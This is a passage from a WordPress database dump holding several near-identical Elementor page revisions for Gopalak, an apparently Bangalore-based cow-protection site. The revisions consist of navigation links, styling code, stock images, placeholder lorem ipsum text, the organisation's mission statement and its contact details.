commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:22:22','2022-10-11 09:52:22','',1373,'https://gopalak.in/?p=1635',0,'revision','',0),(1636,1,'2022-10-11 15:22:22','2022-10-11 09:52:22','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:22:22','2022-10-11 09:52:22','',1373,'https://gopalak.in/?p=1636',0,'revision','',0),(1637,1,'2022-10-11 15:22:22','2022-10-11 09:52:22','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:22:22','2022-10-11 09:52:22','',1373,'https://gopalak.in/?p=1637',0,'revision','',0),(1638,1,'2022-10-11 15:22:29','2022-10-11 09:52:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:22:29','2022-10-11 09:52:29','',1373,'https://gopalak.in/?p=1638',0,'revision','',0),(1639,1,'2022-10-11 15:22:29','2022-10-11 09:52:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" 